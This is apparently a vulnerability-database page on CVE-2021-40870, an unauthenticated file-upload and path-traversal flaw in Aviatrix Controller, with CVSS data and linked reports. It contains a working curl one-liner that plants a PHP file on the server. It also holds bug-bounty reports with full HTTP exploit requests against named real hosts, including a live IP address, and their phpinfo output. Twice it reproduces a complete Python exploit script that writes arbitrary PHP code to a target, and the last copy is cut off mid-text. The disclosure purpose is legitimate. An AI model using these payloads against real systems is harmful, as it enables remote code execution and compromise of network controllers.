Description
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
**Recent assessments:**
**JoyGhoshs** at October 09, 2021 6:33am UTC reported:
### Description
This Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesn’t need any user authentication , or doesn’t require any other users interaction , simply can be exploited using curl . Here is one example.
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'
# after executing the previous command if the target is vulnerable this will create a php file on this path
https://vulnerable.target.com/v1/poc
Attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem .
Or You can Use This Exploit to do the exploition more easily : <https://github.com/JoyGhoshs/CVE-2021-40870>
Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 5
Related
{"id": "AKB:E355AB47-21A0-4270-B1B7-31327C5DB3E0", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-40870", "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n\n \n**Recent assessments:** \n \n**JoyGhoshs** at October 09, 2021 6:33am UTC reported:\n\n### Description\n\nThis Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesn\u2019t need any user authentication , or doesn\u2019t require any other users interaction , simply can be exploited using curl . Here is one example.\n \n \n curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo \"Vulnerable Poc\";?>'\n \n # after executing the previous command if the target is vulnerable this will create a php file on this path\n \n https://vulnerable.target.com/v1/poc \n \n\nAttacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem .\n\nOr You can Use This Exploit to do the exploition more easily : <https://github.com/JoyGhoshs/CVE-2021-40870>\n\n\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "published": "2021-09-13T00:00:00", "modified": "2021-09-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/t5RjZrPTdl/cve-2021-40870", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870", "https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021", "https://wearetradecraft.com/advisories/tc-2021-0002/", "http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html"], "cvelist": ["CVE-2021-40870"], "immutableFields": [], "lastseen": "2022-01-28T23:28:30", "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0951"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-40870"]}, {"type": "githubexploit", "idList": ["474D6E3C-62E7-510A-B8AB-493646E9B2E1", "66AD8042-B9D2-5EC5-B1A6-E743A4AF2A7C"]}, {"type": "hackerone", "idList": ["H1:1356845", "H1:1360593"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164461"]}, {"type": "zdt", "idList": ["1337DAY-ID-36888"]}], "rev": 4}, "score": {"value": 5.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0951"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-40870"]}, {"type": "githubexploit", "idList": ["474D6E3C-62E7-510A-B8AB-493646E9B2E1", "66AD8042-B9D2-5EC5-B1A6-E743A4AF2A7C"]}, {"type": "hackerone", "idList": ["H1:1356845"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164461"]}, {"type": "zdt", "idList": ["1337DAY-ID-36888"]}]}, "exploitation": null, "vulnersScore": 5.5}, "attackerkb": {"attackerValue": 3, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "published": "2022-01-10T16:50:00"}, {"category": "News Article or Blog", "source_url": "https://unit42.paloaltonetworks.com/network-attacks-trends-august-october-2021/", "published": "2022-01-10T16:50:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870"], "Miscellaneous": ["https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021", "https://wearetradecraft.com/advisories/tc-2021-0002/", "http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "pre_auth"], "mitre_vector": {"Execution": ["User Execution: Malicious File(Validated)"]}, "last_activity": "2022-01-10T16:50:00", "_state": {"wildexploited": 1647356733, "dependencies": 1646368334}, "_internal": {"wildexploited_cvelist": ["CVE-2021-40870"]}}
{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:29:53", "description": "A directory traversal vulnerability exists in Aviatrix Controller. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-30T00:00:00", "type": "checkpoint_advisories", "title": "Aviatrix Controller Directory Traversal (CVE-2021-40870)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-12-30T00:00:00", "id": "CPAI-2021-0951", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-06-04T14:11:48", "description": "<p align=\"center\">\n <img src=\"https://img.shields.io/badge/Ve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T17:19:12", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Aviatrix Controller", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2022-06-04T09:50:22", "id": "474D6E3C-62E7-510A-B8AB-493646E9B2E1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:37:17", "description": "# CVE-2021-40870\nUnrestricted upload of file with dange...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T05:35:40", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Aviatrix Controller", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-09T06:42:40", "id": "66AD8042-B9D2-5EC5-B1A6-E743A4AF2A7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "hackerone": [{"lastseen": "2021-11-26T17:55:39", "bounty": 0.0, "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n\nThe IP has a SSL certificate pointing to Informatica LLC. \n``curl -kvI https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588``\n\nOutput\n\n```\n Server certificate:\n* subject: \u2588\u2588\u2588\u2588\u2588\u2588\n```\n\n\n## Steps To Reproduce\n\nFirst, run this request:\n```\nPOST /v1/backend1 HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\nConnection: close\nContent-Length: 136\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>\n\n```\nThe retrieve the content from file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php``\n\n```\nGET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n```\nWhich is basically the output of the phpinfo function:\n\nResponse (truncated): \n```\n<tr class=\"h\"><th>Variable</th><th>Value</th></tr>\n<tr><td class=\"e\">SCRIPT_URL </td><td class=\"v\">/v1/1.php </td></tr>\n<tr><td class=\"e\">SCRIPT_URI </td><td class=\"v\">https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/v1/1.php </td></tr>\n<tr><td class=\"e\">HTTPS </td><td class=\"v\">on </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_ST </td><td class=\"v\">California </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_L </td><td class=\"v\">Redwood City </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_O </td><td class=\"v\">Informatica LLC </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_OU </td><td class=\"v\">\u2588\u2588\u2588\u2588\u2588\u2588 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_CN </td><td class=\"v\">\u2588\u2588\u2588\u2588\u2588\u2588 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_O </td><td class=\"v\">HydrantID (Avalanche Cloud Corporation) </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_CN </td><td class=\"v\">HydrantID SSL ICA G2 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_SAN_DNS_0 </td><td class=\"v\">\u2588\u2588\u2588 </td></tr>\n<tr><td class=\"e\">SSL_VERSION_INTERFACE </td><td class=\"v\">mod_ssl/2.4.39 </td></tr>\n ```\n\n## Impact\n\n- An unauthenticated, 3rd-party attacker or adversary can execute remote code\n \n### Supporting Material/References\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T04:33:57", "type": "hackerone", "title": "Informatica: CVE-2021-40870 in [\u2588\u2588\u2588]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-11-15T09:10:36", "id": "H1:1360593", "href": "https://hackerone.com/reports/1360593", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-05T15:54:54", "bounty": 1760.0, "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n\nThe IP has a SSL certificate pointing to ElasticSearch. \n``curl -kv https://52.204.160.31``\n\nOutput\n\n```\n Server certificate:\n* subject: C=US; ST=California; L=Mountain View; O=Elasticsearch, Inc.; CN=*.elasticit.co\n```\n\n\n## Steps To Reproduce\n\nFirst, run this request:\n```\nPOST /v1/backend1 HTTP/1.1\nHost: 52.204.160.31\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\nConnection: close\nContent-Length: 136\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>\n\n```\nThe retrieve the content from file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php``\n\n```\nGET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1\nHost: 52.204.160.31\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n```\nWhich is basically the output of the phpinfo function:\n\nResponse (truncated): \n```\ntr class=\"h\"><th>Variable</th><th>Value</th></tr>\n<tr><td class=\"e\">SCRIPT_URL </td><td class=\"v\">/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>\n<tr><td class=\"e\">SCRIPT_URI </td><td class=\"v\">https://52.204.160.31:8443/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>\n<tr><td class=\"e\">HTTPS </td><td class=\"v\">on </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_ST </td><td class=\"v\">California </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_L </td><td class=\"v\">Mountain View </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_O </td><td class=\"v\">Elasticsearch, Inc. </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_CN </td><td class=\"v\">*.elasticit.co </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_O </td><td class=\"v\">DigiCert Inc </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_CN </td><td class=\"v\">DigiCert SHA2 Secure Server CA </td></tr>\n<tr><td class=\"e\">SSL_SERVER_SAN_DNS_0 </td><td class=\"v\">*.elasticit.co </td></tr>\n<tr><td class=\"e\">SSL_SERVER_SAN_DNS_1 </td><td class=\"v\">elasticit.co </td></tr>\n<tr><td class=\"e\">SSL_VERSION_INTERFACE </td><td class=\"v\">mod_ssl/2.4.39 </td></tr>\n<tr><td class=\"e\">SSL_VERSION_LIBRARY </td><td class=\"v\">OpenSSL/1.1.1b </td></tr>\n<tr><td class=\"e\">SSL_PROTOCOL </td><td class=\"v\">TLSv1.2 </td></tr>\n<tr><td class=\"e\">SSL_SECURE_RENEG </td><td class=\"v\">true </td></tr>\n<tr><td class=\"e\">SSL_COMPRESS_METHOD </td><td class=\"v\">NULL </td></tr>\n<tr><td class=\"e\">SSL_CIPHER </td><td class=\"v\">ECDHE-RSA-AES128-GCM-SHA256 </td></tr>\n<tr><td class=\"e\">SSL_CIPHER_EXPORT </td><td class=\"v\">false </td></tr>\n<tr><td class=\"e\">SSL_CIPHER_USEKEYSIZE </td><td class=\"v\">128 </td></tr>\n<tr><td class=\"e\">SSL_CIPHER_ALGKEYSIZE </td><td class=\"v\">128 </td></tr>\n<tr><td class=\"e\">SSL_CLIENT_VERIFY </td><td class=\"v\">NONE </td></tr>\n<tr><td class=\"e\">SSL_SERVER_M_VERSION </td><td class=\"v\">3 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_M_SERIAL </td><td class=\"v\">093CE89EF93EE5F18D1E07099ACC5AF9 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_V_START </td><td class=\"v\">Mar 20 00:00:00 2020 GMT </td></tr>\n<tr><td class=\"e\">SSL_SERVER_V_END </td><td class=\"v\">Mar 25 12:00:00 2022 GMT </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN </td><td class=\"v\">CN=*.elasticit.co,O=Elasticsearch\\, Inc.,L=Mountain View,ST=California,C=US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN </td><td class=\"v\">CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_A_KEY </td><td class=\"v\">rsaEncryption </td></tr>\n<tr><td class=\"e\">SSL_SERVER_A_SIG </td><td class=\"v\">sha256WithRSAEncryption </td></tr>\n<tr><td class=\"e\">SSL_SESSION_ID </td><td class=\"v\">9cf6b4b42df9e371982120b49d57f9112c19df3722fb87d15cc592f73e1fa406 </td></tr>\n<tr><td class=\"e\">SSL_SESSION_RESUMED </td><td class=\"v\">Initial </td></tr>\n<tr><td class=\"e\">HTTP_HOST </td><td class=\"v\">52.204.160.31 </td></tr>\n<tr><td class=\"e\">HTTP_USER_AGENT </td><td class=\"v\">Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 </td></tr>\n<tr><td class=\"e\">HTTP_CONNECTION </td><td class=\"v\">close </td></tr>\n ```\n\n## Impact\n\n- An unauthenticated, 3rd-party attacker or adversary can execute remote code\n \n### Supporting Material/References\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870", "cvss3": {}, "published": "2021-10-01T20:20:56", "type": "hackerone", "title": "Elastic: CVE-2021-40870 on [52.204.160.31]", "bulletinFamily": "bugbounty", "cvss2": {}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-06T16:06:41", "id": "H1:1356845", "href": "https://hackerone.com/reports/1356845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T19:13:39", "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T08:15:00", "type": "cve", "title": "CVE-2021-40870", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-12-14T21:20:00", "cpe": [], "id": "CVE-2021-40870", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40870", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "zdt": [{"lastseen": "2021-12-20T06:08:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T00:00:00", "type": "zdt", "title": "Aviatrix Controller 6.x Path Traversal / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-12T00:00:00", "id": "1337DAY-ID-36888", "href": "https://0day.today/exploit/description/36888", "sourceData": "#!/usr/bin/env python3\nimport requests\nfrom requests.structures import CaseInsensitiveDict\nfrom colorama import Fore, Style\nimport argparse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nprint(f\"\"\"\n\n\u2591\u2588\u2580\u2580\u2588 \u2591\u2588\u2500\u2500\u2591\u2588 \u2591\u2588\u2580\u2580\u2580 \u2500\u2500 \u2588\u2580\u2588 \u2588\u2580\u2580\u2588 \u2588\u2580\u2588 \u2584\u2588\u2500 \u2500\u2500 \u2500\u2588\u2580\u2588\u2500 \u2588\u2580\u2580\u2588 \u2584\u2580\u2580\u2584 \u2584\u2580\u2580\u2584 \u2588\u2580\u2580\u2588\n\u2591\u2588\u2500\u2500\u2500 \u2500\u2591\u2588\u2591\u2588\u2500 \u2591\u2588\u2580\u2580\u2580 \u2580\u2580 \u2500\u2584\u2580 \u2588\u2584\u2580\u2588 \u2500\u2584\u2580 \u2500\u2588\u2500 \u2580\u2580 \u2588\u2584\u2584\u2588\u2584 \u2588\u2584\u2580\u2588 \u2584\u2580\u2580\u2584 \u2588\u2584\u2584\u2500 \u2588\u2584\u2580\u2588\n\u2591\u2588\u2584\u2584\u2588 \u2500\u2500\u2580\u2584\u2580\u2500 \u2591\u2588\u2584\u2584\u2584 \u2500\u2500 \u2588\u2584\u2584 \u2588\u2584\u2584\u2588 \u2588\u2584\u2584 \u2584\u2588\u2584 \u2500\u2500 \u2500\u2500\u2500\u2588\u2500 \u2588\u2584\u2584\u2588 \u2580\u2584\u2584\u2580 \u2580\u2584\u2584\u2580 \u2588\u2584\u2584\u2588\n Author : 0xJoyGhosh\n Org : System00 Security\n Twitter: @0xjoyghosh\n\n\"\"\")\ntry:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\", \"--url\", help=\"Enter Target Url With scheme Ex: -u https://avaitix.target.com\", type=str)\n parser.add_argument(\"-c\", \"--code\", help=\"Enter php code Ex: -c '<?php phpinfo(); ?>' \", type=str)\n parser.add_argument(\"-n\", \"--name\", help=\"Enter php code Ex: -n 'filename' \", type=str)\n args = parser.parse_args()\n url =f\"{args.url}/v1/backend1\"\nexcept TypeError:\n print(\"Type -h To See all the options\")\nexcept():\n exit()\ndef exploit(url,path,code):\n headers = CaseInsensitiveDict()\n headers[\"Content-Type\"] = \"application/x-www-form-urlencoded\"\n data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'\n resp = requests.post(url, headers=headers, data=data,verify=False)\n stat = requests.get(f\"{args.url}/v1/{path}\",verify=False)\n if resp.status_code==200:\n if stat.status_code==200:\n print(f\"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]\")\n print(\"\")\n else:\n print(\"[ Exploit successful Creating File Failed ]\")\n pass\n else:\n print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')\n\nif args.url is not None:\n if args.code is not None:\n if args.name is not None:\n exploit(url,args.name,args.code)\n else:\n print('Type -h to see help Menu')\n else:\n print('Type -h to see help Menu')\nelse:\n print('Type -h to see help Menu')\n", "sourceHref": "https://0day.today/exploit/36888", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-10-11T14:33:21", "description": "", "cvss3": {}, "published": "2021-10-11T00:00:00", "type": "packetstorm", "title": "Aviatrix Controller 6.x Path Traversal / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-11T00:00:00", "id": "PACKETSTORM:164461", "href": "https://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html", "sourceData": "`#!/usr/bin/env python3 \nimport requests \nfrom requests.structures import CaseInsensitiveDict \nfrom colorama import Fore, Style \nimport argparse \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nprint(f\"\"\" \n \n\u2591\u2588\u2580\u2580\u2588 \u2591\u2588\u2500\u2500\u2591\u2588 \u2591\u2588\u2580\u2580\u2580 \u2500\u2500 \u2588\u2580\u2588 \u2588\u2580\u2580\u2588 \u2588\u2580\u2588 \u2584\u2588\u2500 \u2500\u2500 \u2500\u2588\u2580\u2588\u2500 \u2588\u2580\u2580\u2588 \u2584\u2580\u2580\u2584 \u2584\u2580\u2580\u2584 